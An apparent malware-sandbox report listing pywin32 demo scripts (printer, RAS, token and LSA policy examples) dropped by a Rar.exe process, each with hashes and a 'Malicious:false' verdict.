                                                                                                                                                                                      Preview:import pywintypes.import win32api.import win32con.import win32gui.import win32print..pname = win32print.GetDefaultPrinter().print(pname).p = win32print.OpenPrinter(pname).print("Printer handle: ", p).print_processor = win32print.GetPrinter(p, 2)["pPrintProcessor"].## call with last parm set to 0 to get total size needed for printer's DEVMODE.dmsize = win32print.DocumentProperties(0, p, pname, None, None, 0).## dmDriverExtra should be total size - fixed size.driverextra = (. dmsize - pywintypes.DEVMODEType().Size.) ## need a better way to get DEVMODE.dmSize.dm = pywintypes.DEVMODEType(driverextra).dm.Fields = dm.Fields | win32con.DM_ORIENTATION | win32con.DM_COPIES.dm.Orientation = win32con.DMORIENT_LANDSCAPE.dm.Copies = 2.win32print.DocumentProperties(. 0, p, pname, dm, dm, win32con.DM_IN_BUFFER | win32con.DM_OUT_BUFFER.)..pDC = win32gui.CreateDC(print_processor, pname, dm).printerwidth = win32print.GetDeviceCaps(pDC, win32con.PHYSICALWIDTH).printerheight = win32print.GetDeviceC
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5119
                                                                                                                                                                                      Entropy (8bit):4.511953665676077
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:wIXZgAxi7KRWyEAkFY564o3qwi0JjfcAfB++IsYZ+zi:wIJ1A7cWyExOdo3qsjUAfB++UUi
                                                                                                                                                                                      MD5:347610E8C7711F155A18C0D2F7C0352B
                                                                                                                                                                                      SHA1:85807052AA60E4B5C373A4F58247F28D17687127
                                                                                                                                                                                      SHA-256:7E0672B7B0DECDB4DE70FD6E60310F2C7680B6BB72637532CF9B1F7309C87C25
                                                                                                                                                                                      SHA-512:74166363C0DF4D2E2AFE037DE405E964F57BD50DD5464D749861C46C4E1031969D13D62286283EA4EF202E04846DF86E34EEA47F554CDD259622185075975483
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# rastest.py - test/demonstrate the win32ras module..# Much of the code here contributed by Jethro Wright...import os.import sys..import win32ras..# Build a little dictionary of RAS states to decent strings..# eg win32ras.RASCS_OpenPort -> "OpenPort".stateMap = {}.for name, val in list(win32ras.__dict__.items()):. if name[:6] == "RASCS_":. stateMap[val] = name[6:]..# Use a lock so the callback can tell the main thread when it is finished..import win32event..callbackEvent = win32event.CreateEvent(None, 0, 0, None)...def Callback(hras, msg, state, error, exterror):. # print "Callback called with ", hras, msg, state, error, exterror. stateName = stateMap.get(state, "Unknown state?"). print("Status is %s (%04lx), error code is %d" % (stateName, state, error)). finished = state in [win32ras.RASCS_Connected]. if finished:. win32event.SetEvent(callbackEvent). if error != 0 or int(state) == win32ras.RASCS_Disconnected:. # we know for sure t
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3738
                                                                                                                                                                                      Entropy (8bit):4.905364376160403
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:wbyTs6+DD1B+xkMJ6g09u1n5B82lHIOt8qtbvGAB2qX60:ti1B6kw702n5B82lHIvWNB2260
                                                                                                                                                                                      MD5:7B913DC758A779FFDDEA7E0D37EBE7A5
                                                                                                                                                                                      SHA1:663C68C7B556954444E5B5BAA991578B85A43871
                                                                                                                                                                                      SHA-256:482D57BCEB5C175FFDB0C2BE6CD25CEF2131D8F327B47926C7DA699DB9A89A80
                                                                                                                                                                                      SHA-512:C500AAB1BCD3DD9F005A65A173C0D0B63823952CE864BD0F4C10C44C549A86B02E437218720327E187C457666D5C94A2EFDE25A20E70BC4B62EC4655D44734DF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Lists various types of information about current user's access token,. including UAC status on Vista."""..import pywintypes.import win32api.import win32con.import win32security.import winerror.from security_enums import (. SECURITY_IMPERSONATION_LEVEL,. TOKEN_ELEVATION_TYPE,. TOKEN_GROUP_ATTRIBUTES,. TOKEN_PRIVILEGE_ATTRIBUTES,. TOKEN_TYPE,.)...def dump_token(th):. token_type = win32security.GetTokenInformation(th, win32security.TokenType). print("TokenType:", token_type, TOKEN_TYPE.lookup_name(token_type)). if token_type == win32security.TokenImpersonation:. imp_lvl = win32security.GetTokenInformation(. th, win32security.TokenImpersonationLevel. ). print(. "TokenImpersonationLevel:",. imp_lvl,. SECURITY_IMPERSONATION_LEVEL.lookup_name(imp_lvl),. ).. print(. "TokenSessionId:",. win32security.GetTokenInformation(th, win32security.TokenSessionId),. ).. privs = win
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1601
                                                                                                                                                                                      Entropy (8bit):5.2466444341148915
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:1hmZwhp2hVJhBhh/zznnPUMSdDa4MYC/pkCO73AgELLGmrG73AKNn:13hcrJnhJ3nnPPSNXMYC/mEgELLwEYn
                                                                                                                                                                                      MD5:A8EB3625681C9A6CC94C98E822B01430
                                                                                                                                                                                      SHA1:866FD6D4341E8063991E151E331790C267719092
                                                                                                                                                                                      SHA-256:16CA9F905009A0526D1D5ED466271F86F4F75663AE2E6AE7DA22A5E5AA585CDF
                                                                                                                                                                                      SHA-512:C33BB12877845E24DA0529F2C2CE99B82DC5F83312D027E2FCBD7CF22B7441E205BFB3E508293E73D7F4C95ECC4FF79F8C2092720E6CD19A5B98A1F59CCC1628
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import ntsecuritycon.import win32api.import win32con.import win32file.import win32security.from security_enums import ACCESS_MODE, ACE_FLAGS, TRUSTEE_FORM, TRUSTEE_TYPE..new_privs = (. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_CREATE_PERMANENT_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", "SeEnableDelegationPrivilege"),. win32con.SE_PRIVILEGE_ENABLED,. ), ##doesn't seem to be in ntsecuritycon.py ?.)..ph = win32api.GetCurrentProcess().th = win32security.OpenProcessToken(. ph, win32security.TOKEN_ALL_ACCESS.) ##win32con.TOKEN_ADJUST_PRIVILEGES).win32security.AdjustTokenPrivileges(th, 0, new_privs)..policy_handle = win32security.GetPolicyHandle("", win32security.POLICY_ALL_ACCESS).tmp_sid = win32security.LookupAccountName("", "tmp")[0]..privs = [. ntsecuri
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4982
                                                                                                                                                                                      Entropy (8bit):5.24705878297574
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:8FBrRcYK5NhJ3PqF5VjhInHnp7PWKqocmucmPcmwcm9cmFcmZcmRcm3wK:Or+YK5NhJ/qHcnHp7PWKqocmucmPcmwb
                                                                                                                                                                                      MD5:ECA138C7B9FBBEDA6649E1E09F0DF95D
                                                                                                                                                                                      SHA1:D396A7CF23F109CC687B2D65A39EBC8631D5501B
                                                                                                                                                                                      SHA-256:9A5B596AB47503F4E5FCB0D02D1B21C1AD94F1F036B981A99F4FE9C8501CA139
                                                                                                                                                                                      SHA-512:1600C901014A6FCA6CCA41EAC797A6FA340E994D8613130074E2872FF294B09A6B76916A732DB31CF50E941591DCC12BB8BEC5D4494921AA67AFBBDCBAB6A2C3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import os..import ntsecuritycon.import win32api.import win32con.import win32file.import win32security.from security_enums import ACCESS_MODE, ACE_FLAGS, TRUSTEE_FORM, TRUSTEE_TYPE..fname = os.path.join(win32api.GetTempPath(), "win32security_test.txt").f = open(fname, "w").f.write("Hello from Python\n").f.close().print("Testing on file", fname)..new_privs = (. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SHUTDOWN_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_RESTORE_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_TAKE_OWNERSHIP_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_CREATE_PERMANENT_NAME),. win3
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1243
                                                                                                                                                                                      Entropy (8bit):4.826107186911052
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:1dVaWnVQMN4MvDZriSrxC8rrkiQOIiThZUIiCZfpirjFNn:1zXvDnxC8rVUYf8jzn
                                                                                                                                                                                      MD5:474FBFA718653659E1E7041B60B5CDC1
                                                                                                                                                                                      SHA1:BDAD73C99EBB28EB782B81F6B9365C8D9F53A429
                                                                                                                                                                                      SHA-256:EE3264A6EA5BC3EF455DB3B1308E6D6EFD153736B3864C6AFFE3CF83A4C1DD29
                                                                                                                                                                                      SHA-512:952543CA9A75A9D3F3CB0B6C573AE1CA58849370EF5FD4D3A2A5D3DB6BEBAADC54EE226C317F8C9DE1C6C101BE4DB82F692D284C722D3873ED82F9405B1660AE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import ntsecuritycon.import win32api.import win32file.import win32security..policy_handle = win32security.GetPolicyHandle("rupole", win32security.POLICY_ALL_ACCESS)..## mod_nbr, mod_time = win32security.LsaQueryInformationPolicy(policy_handle,win32security.PolicyModificationInformation).## print mod_nbr, mod_time..(. domain_name,. dns_domain_name,. dns_forest_name,. domain_guid,. domain_sid,.) = win32security.LsaQueryInformationPolicy(. policy_handle, win32security.PolicyDnsDomainInformation.).print(domain_name, dns_domain_name, dns_forest_name, domain_guid, domain_sid)..event_audit_info = win32security.LsaQueryInformationPolicy(. policy_handle, win32security.PolicyAuditEventsInformation.).print(event_audit_info)..domain_name, sid = win32security.LsaQueryInformationPolicy(. policy_handle, win32security.PolicyPrimaryDomainInformation.).print(domain_name, sid)..domain_name, sid = win32security.LsaQueryInformationPolicy(. policy_handle, win32security.PolicyAccou
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1142
                                                                                                                                                                                      Entropy (8bit):5.222962792869748
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:1hmZwhp2hVJhBhh/zznnPUMSdDabSsQZ8Nn:13hcrJnhJ3nnPPSN88qn
                                                                                                                                                                                      MD5:3C91061F858441D3452E1DF39EA29436
                                                                                                                                                                                      SHA1:1F0B24F95ADB0023492501653F89647D4AA4AE1F
                                                                                                                                                                                      SHA-256:68A481C6BCD6FCDA88A0C957BFDF2CEFDAEE895E4FD1E61C00FF24792095A883
                                                                                                                                                                                      SHA-512:64C9FA96B29218FE2E8F408633A4E4F76A4B2D5167DE27B4DBA5B11C357D6AA80313C6C5E6079FD77F453C1FD6021DE13BEDDEE61EE0373FF8F4E35FCD0A0152
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import ntsecuritycon.import win32api.import win32con.import win32file.import win32security.from security_enums import ACCESS_MODE, ACE_FLAGS, TRUSTEE_FORM, TRUSTEE_TYPE..new_privs = (. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_CREATE_PERMANENT_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", "SeEnableDelegationPrivilege"),. win32con.SE_PRIVILEGE_ENABLED,. ), ##doesn't seem to be in ntsecuritycon.py ?.)..ph = win32api.GetCurrentProcess().th = win32security.OpenProcessToken(. ph, win32security.TOKEN_ALL_ACCESS.) ##win32con.TOKEN_ADJUST_PRIVILEGES).win32security.AdjustTokenPrivileges(th, 0, new_privs)..policy_handle = win32security.GetPolicyHandle("", win32security.POLICY_ALL_ACCESS)..sidlist = win32security.LsaEnumerateAccountsWithUserRight(. policy_handle,
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2014
                                                                                                                                                                                      Entropy (8bit):4.963463813027583
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:5mRAZ3dglAepb18kfCy6Tq/wjRRzCNXd4mskDTq/deI3YG9P1Oi:5mmVdgR85MwjRRzCAfKMdbYG99Oi
                                                                                                                                                                                      MD5:42D316038232ACEB8893229577D4388C
                                                                                                                                                                                      SHA1:100EDC412265A66533472CC3117FCCB93866E1E2
                                                                                                                                                                                      SHA-256:774AA56DBC4A7E982740EF586FC1A12584591D8B5EACC00E9E7FCEE81691A3B0
                                                                                                                                                                                      SHA-512:0502AB71542AE07E451BE1EBCBE8755785D915F1F1AB16D3181EB03FB359A17353418767EEC64F5AB66B20EB41C97977B244EAEA32FBA8CB237D3AAA2556D71F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# A Python port of the MS knowledge base article Q157234.# "How to deal with louserzed and renamed user and group names".# http://support.microsoft.com/default.aspx?kbid=157234..import sys..import pywintypes.from ntsecuritycon import *.from win32net import NetUserModalsGet.from win32security import LookupAccountSid...def LookupAliasFromRid(TargetComputer, Rid):. # Sid is the same regardless of machine, since the well-known. # BUILTIN domain is referenced.. sid = pywintypes.SID(). sid.Initialize(SECURITY_NT_AUTHORITY, 2).. for i, r in enumerate((SECURITY_BUILTIN_DOMAIN_RID, Rid)):. sid.SetSubAuthority(i, r).. name, domain, typ = LookupAccountSid(TargetComputer, sid). return name...def LookupUserGroupFromRid(TargetComputer, Rid):. # get the account domain Sid on the target machine. # note: if you were looking up multiple sids based on the same. # account domain, only need to call this once.. umi2 = NetUserModalsGet(TargetComputer, 2). domain_sid
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):532
                                                                                                                                                                                      Entropy (8bit):4.892813022065808
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:4LeLhsLM5eLUSWKUHXAV/FTMNFSs4PNLAXKCJZplNPQM3AV/Fp:Z9c10HXAQFSflUzXplNxA1
                                                                                                                                                                                      MD5:7FE72D1C66C68BF2236E8E5B4E06AD82
                                                                                                                                                                                      SHA1:EAC9ACD7D5E552EDBC404028CAA862CD39574F23
                                                                                                                                                                                      SHA-256:635057C3AFDD79AA63C70008E849DBE16DE3C3F0C42E46756AD66B3AC8B3A555
                                                                                                                                                                                      SHA-512:FFC8ECB562BA19C51885C3BDFC7DFAEE8C76BF548E7F947B9637BAB7CAB7FD8384BED963EB3D62915ADDBA672AE283BCF25AD752F582E8DF762E014457B0711B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import win32event.import win32security..evt = win32event.CreateEvent(None, 0, 0, None).win32security.LsaRegisterPolicyChangeNotification(. win32security.PolicyNotifyAuditEventsInformation, evt.).print("Waiting for you change Audit policy in Management console ...").ret_code = win32event.WaitForSingleObject(evt, 1000000000).## should come back when you change Audit policy in Management console ....print(ret_code).win32security.LsaUnregisterPolicyChangeNotification(. win32security.PolicyNotifyAuditEventsInformation, evt.).
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):472
                                                                                                                                                                                      Entropy (8bit):4.864220721097227
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:4LM8ahSBkwMouLHPooPWBJvFlqo+/vokBLn5SWPooSK+wZ9vn:0aMXuUo+jv7avxUoZNn
                                                                                                                                                                                      MD5:39AC2663BCC3306EC873C140CAE98CD7
                                                                                                                                                                                      SHA1:DE14DA2DCEA2D2DCCC06323E81C2C4A58602CD36
                                                                                                                                                                                      SHA-256:737176D134E0A8117D2AB9539CAB55D7D30BCF7E2ADD7F7C6B3BF65409B8256F
                                                                                                                                                                                      SHA-512:6F72B6911C916E7DE0FC27F57618464150A2A1934E427B8BBFE1131EC574FFA6619AED33E1583520140B0B66DFB039329B0683AF0FBCD8965B6223A3E54108B3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import win32security..policy_handle = win32security.GetPolicyHandle("", win32security.POLICY_ALL_ACCESS).privatedata = "some sensitive data".keyname = "tmp".win32security.LsaStorePrivateData(policy_handle, keyname, privatedata).retrieveddata = win32security.LsaRetrievePrivateData(policy_handle, keyname).assert retrieveddata == privatedata..## passing None deletes key.win32security.LsaStorePrivateData(policy_handle, keyname, None).win32security.LsaClose(policy_handle).
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):791
                                                                                                                                                                                      Entropy (8bit):4.8217987561958005
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:4LzLM4L7+hpoS4ZfpKlzl4ryZCSYyGLPhs0KGbG+Jpt4eWd3uvaCTJTF72pOM:KujqM1l4yHY7sHKvJptn5NTJFipf
                                                                                                                                                                                      MD5:36AE55ECA7E61DD9D9A9EB3CE6634D26
                                                                                                                                                                                      SHA1:E8D7F767A8C2F23A7550EC885A9CD2E631D01068
                                                                                                                                                                                      SHA-256:DFB854F3D6FFBCC306FA74A9F88DAAE17C669C018D1E4A40AD939DA9F497D043
                                                                                                                                                                                      SHA-512:357D4D360A781292C9DDD89149A446A1909B0DEF0EBE38087A37B3C3F86F708548089B994BF3EFC3953171E44D02C690956848AFEF796EB5D12E303BEF034036
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import win32api.import win32security.import winerror.from ntsecuritycon import *...# This is a Python implementation of win32api.GetDomainName().def GetDomainName():. try:. tok = win32security.OpenThreadToken(win32api.GetCurrentThread(), TOKEN_QUERY, 1). except win32api.error as details:. if details[0] != winerror.ERROR_NO_TOKEN:. raise. # attempt to open the process token, since no thread token. # exists. tok = win32security.OpenProcessToken(win32api.GetCurrentProcess(), TOKEN_QUERY). sid, attr = win32security.GetTokenInformation(tok, TokenUser). win32api.CloseHandle(tok).. name, dom, typ = win32security.LookupAccountSid(None, sid). return dom...if __name__ == "__main__":. print("Domain name is", GetDomainName()).
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1690
                                                                                                                                                                                      Entropy (8bit):5.320880029428467
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:Z57cjK3KmpnnPkS3NothAlWfwuMJXej9P7:z7cjYKmpPpdiPUF4x7
                                                                                                                                                                                      MD5:6839DCBAFD537FCD03128D64D6DDAF88
                                                                                                                                                                                      SHA1:1230CA9595A5556C8BEFD6E7F343499F86634C95
                                                                                                                                                                                      SHA-256:7AE2098259C3EE6535460E061202B7345E6884EF561231E4D8505DA90A573554
                                                                                                                                                                                      SHA-512:97A5744424DCC879947F10FC1A375CCA988A5A49A486D53744223ED64AC9E00F94731D4A033BB47EFF69432265CE8F091858C5DEC43C4B84D5EE42A8FAA17E09
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:fname = "h:\\tmp.reg"..import os..import ntsecuritycon.import pywintypes.import win32api.import win32con.import win32security..## regsave will not overwrite a file.if os.path.isfile(fname):. os.remove(fname)..new_privs = (. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_TCB_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_BACKUP_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_RESTORE_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),.).ph = win32api.GetCurrentProcess().th = win32security.OpenProcessToken(. ph, win32security.TOKEN_ALL_ACCESS | win32con.TOKEN_ADJUST_PRIVILEGES.).win32security.AdjustTokenPrivileges(th, 0, new_privs).my_sid = win32security.GetTokenInformation(th, ntse
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1121
                                                                                                                                                                                      Entropy (8bit):5.34664595251249
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:14p2hdh8pnnPkShpotD3aWwHVsfrJKT/MAbhcgWGQRTv:14cjmpnnPkSHot2GfdEMAbhcgWr9
                                                                                                                                                                                      MD5:2C220CB380A755404147D2E3BA4C5011
                                                                                                                                                                                      SHA1:8FC74D6B17D8ABE8B70F9B2A2253D1D945B6F2FE
                                                                                                                                                                                      SHA-256:F7F632E99DBDE61350D2A3184AE49DE93FF288D087EEA9221476B1487947F095
                                                                                                                                                                                      SHA-512:BC1DB9C209C723BC943C13888CE202282E24E30105433304017CD22F9DD7DE852F895AA973D01C559B492184B82B7761304B53B065D07A244559C437FDCAB6D9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import ntsecuritycon.import win32api.import win32con.import win32security..new_privs = (. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_TCB_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),.).ph = win32api.GetCurrentProcess().th = win32security.OpenProcessToken(. ph, win32security.TOKEN_ALL_ACCESS | win32con.TOKEN_ADJUST_PRIVILEGES.)..win32security.AdjustTokenPrivileges(th, 0, new_privs).hkey = win32api.RegOpenKey(. win32con.HKEY_LOCAL_MACHINE, None, 0, win32con.KEY_ALL_ACCESS.).win32api.RegCreateKey(hkey, "SYSTEM\\NOTMP").notmpkey = win32api.RegOpenKey(. hkey, "SYSTEM\\notmp", 0, win32con.ACCESS_SYSTEM_SECURITY.)..tmp_sid = win32security.LookupAccountName("", "tmp")[0].sacl = win32security.ACL().sacl.AddAuditAccessAce(win32security.ACL_REVISION, win32con.GENERIC_ALL, tmp_sid, 1, 1)..sd = win32security.SECURITY_DESCRIPTOR
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):281
                                                                                                                                                                                      Entropy (8bit):5.121297598616513
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:kRWL/ReuCjpEBXVjRRBxarV24/2lgHg1g3/2lCRBLnH:kwLMuCyFjRMrVV+lgIgulOr
                                                                                                                                                                                      MD5:585C9D69157820F89A295C77539CC0A7
                                                                                                                                                                                      SHA1:2BF372C54C793C22FD252A31687F20B32ED1D40E
                                                                                                                                                                                      SHA-256:07368D5693F1F59A9A75B0B8019622EF0C13686CF769F7A6FCF11C8298F9D6B7
                                                                                                                                                                                      SHA-512:531A9CB035B034D5A51207FE39FA458D47E5AFF76A13B750AD4F9C4FD13E8E45A57EF9D1D39132D8699D39459204D255A773428C9509481A3E4DA4F0A3F9B3E7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import pywintypes.import win32security..sa = pywintypes.SECURITY_ATTRIBUTES().tmp_sid = win32security.LookupAccountName("", "tmp")[0].sa.SetSecurityDescriptorOwner(tmp_sid, 0).sid = sa.SECURITY_DESCRIPTOR.GetSecurityDescriptorOwner().print(win32security.LookupAccountSid("", sid)).
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9455
                                                                                                                                                                                      Entropy (8bit):5.099713879626992
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:obgfeul5n5WEfqvrV9f0V2dVElGv6/cAc1lFblMQ/1978KOeVb21BbeAqlbxN4xT:o/fl2x
                                                                                                                                                                                      MD5:1022B8A344444AE8ED0CE8B28B63B356
                                                                                                                                                                                      SHA1:89F0A09E8B9A4BE32C6062F42BE4ABE7115BD6F2
                                                                                                                                                                                      SHA-256:91BA21A23BF7AB044F49A8E7E7264ACFF0109DE3281D30969BED0FFCFE4FC6B0
                                                                                                                                                                                      SHA-512:2706E6EDC6983E86BFA1CDF6777881254ABBF7359CF41D74D68C7E586E0DE294576F6F4DEB7628155CC339E2155A8D41E2137291B2AA22BBB6A75C1AA8565EE9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import ntsecuritycon.import win32security.import winnt...class Enum:. def __init__(self, *const_names):. """Accepts variable number of constant names that can be found in either. win32security, ntsecuritycon, or winnt.""". for const_name in const_names:. try:. const_val = getattr(win32security, const_name). except AttributeError:. try:. const_val = getattr(ntsecuritycon, const_name). except AttributeError:. try:. const_val = getattr(winnt, const_name). except AttributeError:. raise AttributeError(. 'Constant "%s" not found in win32security, ntsecuritycon, or winnt.'. % const_name. ). setattr(self, const_name, const_val).. def lookup_name(self, const_val):. """Looks up the name of a particular value.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3372
                                                                                                                                                                                      Entropy (8bit):5.295959335066199
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:J+cKmpPpEf/gnFU3KSb5a89KmZywFVF1f1isGGoa:JzKmVp50b/tV
                                                                                                                                                                                      MD5:2DB725B308FF772F50BC84EF9809EE40
                                                                                                                                                                                      SHA1:86ED4BA5FCE949AFCBCA967733867231A023521A
                                                                                                                                                                                      SHA-256:DBC8B5F7C6D4F28D6506703A110BBD452FB4231B4127281223A44D8E79CE5CFC
                                                                                                                                                                                      SHA-512:ABAB163113EE68A20BF70B1A89BF01CF3A4EC512F0299B671BF68DBC48BD62F41E052AB8C3EA1EA02C96973A2DF62F51B0BA27BB3A11BE55A20F3B093FC7E89E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
